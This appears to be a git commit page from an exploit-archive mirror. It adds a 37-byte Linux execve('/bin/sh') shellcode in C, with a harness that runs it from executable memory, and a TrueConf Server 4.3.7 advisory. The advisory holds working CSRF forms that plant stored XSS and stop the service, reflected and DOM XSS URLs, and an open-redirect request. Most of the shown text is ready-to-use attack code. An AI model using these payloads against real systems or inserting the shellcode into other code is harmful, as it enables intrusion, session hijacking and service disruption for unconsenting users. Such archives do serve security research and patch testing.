DB: 2017-01-30
2 new exploits Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes) TrueConf Server 4.3.7 - Multiple Vulnerabilities
This commit is contained in:
parent
2b017ecadf
commit
6df10a3616
3 changed files with 213 additions and 0 deletions
|
@ -15853,6 +15853,7 @@ id,file,description,date,author,platform,type,port
|
|||
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37114,3 +37115,4 @@ id,file,description,date,author,platform,type,port
|
|||
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
|
||||
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
|
||||
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
|
||||
41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
79
platforms/linux/shellcode/41183.c
Executable file
79
platforms/linux/shellcode/41183.c
Executable file
|
@ -0,0 +1,79 @@
|
|||
/**
|
||||
Copyright © 2017 Odzhan. All Rights Reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
|
||||
3. The name of the author may not be used to endorse or promote products
|
||||
derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
|
||||
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
|
||||
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
||||
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
||||
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
|
||||
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
|
||||
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGE. */
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdint.h>
|
||||
|
||||
#include <sys/mman.h>
|
||||
|
||||
#define SHX_SIZE 37
|
||||
|
||||
char SHX[] = {
|
||||
/* 0000 */ "\x31\xf6" /* xor esi, esi */
|
||||
/* 0002 */ "\xf7\xe6" /* mul esi */
|
||||
/* 0004 */ "\x52" /* push rdx */
|
||||
/* 0005 */ "\x52" /* push rdx */
|
||||
/* 0006 */ "\x52" /* push rdx */
|
||||
/* 0007 */ "\x54" /* push rsp */
|
||||
/* 0008 */ "\x5b" /* pop rbx */
|
||||
/* 0009 */ "\x53" /* push rbx */
|
||||
/* 000A */ "\x5f" /* pop rdi */
|
||||
/* 000B */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */
|
||||
/* 0011 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
|
||||
/* 0018 */ "\x40\x75\x04" /* jnz 0x1f */
|
||||
/* 001B */ "\xb0\x3b" /* mov al, 0x3b */
|
||||
/* 001D */ "\x0f\x05" /* syscall */
|
||||
/* 001F */ "\x31\xc9" /* xor ecx, ecx */
|
||||
/* 0021 */ "\xb0\x0b" /* mov al, 0xb */
|
||||
/* 0023 */ "\xcd\x80" /* int 0x80 */
|
||||
};
|
||||
|
||||
void xcode(char *s, int len)
|
||||
{
|
||||
void *bin;
|
||||
|
||||
bin=mmap (0, len,
|
||||
PROT_EXEC | PROT_WRITE | PROT_READ,
|
||||
MAP_ANON | MAP_PRIVATE, -1, 0);
|
||||
|
||||
memcpy (bin, s, len);
|
||||
|
||||
// execute
|
||||
((void(*)())bin)();
|
||||
|
||||
munmap (bin, len);
|
||||
}
|
||||
|
||||
int main(void)
|
||||
{
|
||||
xcode (SHX, SHX_SIZE);
|
||||
return 0;
|
||||
}
|
||||
|
132
platforms/php/webapps/41184.txt
Executable file
132
platforms/php/webapps/41184.txt
Executable file
|
@ -0,0 +1,132 @@
|
|||
TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
|
||||
|
||||
|
||||
Vendor: TrueConf LLC
|
||||
Product web page: https://www.trueconf.com
|
||||
Affected version: 4.3.7.12255 and 4.3.7.12219
|
||||
|
||||
Summary: TrueConf Server is a powerful, high-quality and highly secured
|
||||
video conferencing software server. It is specially designed to work with
|
||||
up to 250 participants in a multipoint conference over LAN or VPN networks.
|
||||
TrueConf Server requires no hardware and includes client applications for
|
||||
all popular platforms, making it an easy-to-set up, unified communications
|
||||
solution.
|
||||
|
||||
Desc: The administration interface allows users to perform certain actions
|
||||
via HTTP requests without performing any validity checks to verify the requests.
|
||||
This can be exploited to perform certain actions with administrative privileges
|
||||
if a logged-in user visits a malicious web site.
|
||||
|
||||
Input passed via the 'redirect_url' GET parameter is not properly verified before
|
||||
being used to redirect users. This can be exploited to redirect a user to an
|
||||
arbitrary website e.g. when a user clicks a specially crafted link to the affected
|
||||
script hosted on a trusted domain.
|
||||
|
||||
TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
|
||||
input passed via several parameters to several scripts is not properly sanitized
|
||||
before being returned to the user. This can be exploited to execute arbitrary HTML
|
||||
and script code in a user's browser session in context of an affected site.
|
||||
|
||||
|
||||
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||
Apache/2.4.17 (Win32)
|
||||
PHP/5.4.41
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2017-5393
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
|
||||
|
||||
|
||||
01.11.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
CSRF Stored XSS:
|
||||
----------------
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
|
||||
<input type="hidden" name="send_invite_mail" value="1" />
|
||||
<input type="hidden" name="invitation_type" value="-1" />
|
||||
<input type="hidden" name="hide_invitation_type" value="-1" />
|
||||
<input type="hidden" name="date" value="22.01.2017" />
|
||||
<input type="hidden" name="time-field" value="17:27" />
|
||||
<input type="hidden" name="time_zone" value="60" />
|
||||
<input type="hidden" name="subtype" value="3" />
|
||||
<input type="hidden" name="podiums" value="6" />
|
||||
<input type="hidden" name="cid" value="\c\dfa95f7e1d" />
|
||||
<input type="hidden" name="key" value="dfa95f7e1d" />
|
||||
<input type="hidden" name="topic" value="<script>alert('XSS')</script>" />
|
||||
<input type="hidden" name="description" value="" />
|
||||
<input type="hidden" name="owner" value="" />
|
||||
<input type="hidden" name="gconf-edit" value="ok" />
|
||||
<input type="hidden" name="webTtype" value="0" />
|
||||
<input type="submit" value="Submit form" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
Reflected XSS:
|
||||
--------------
|
||||
|
||||
http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
|
||||
http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
|
||||
http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
|
||||
http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
|
||||
|
||||
|
||||
|
||||
DOM XSS:
|
||||
--------
|
||||
|
||||
http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
|
||||
http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
|
||||
|
||||
|
||||
|
||||
Open Redirect:
|
||||
--------------
|
||||
|
||||
Request:
|
||||
|
||||
GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
|
||||
Host: 127.0.0.1:8888
|
||||
Connection: Keep-alive
|
||||
Accept-Encoding: gzip,deflate
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
|
||||
Accept: */*
|
||||
|
||||
Response:
|
||||
|
||||
HTTP/1.1 302 Found
|
||||
Date: Thu, 22 Sep 2016 21:15:40 GMT
|
||||
Server: Apache
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Location: http://www.zeroscience.mk
|
||||
Content-Length: 0
|
||||
Keep-Alive: timeout=5, max=75
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
|
||||
|
||||
CSRF Stop Web Service:
|
||||
----------------------
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://127.0.0.1/admin/service/stop/" method="POST">
|
||||
<input type="submit" value="Submit form" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
Loading…
Add table
Reference in a new issue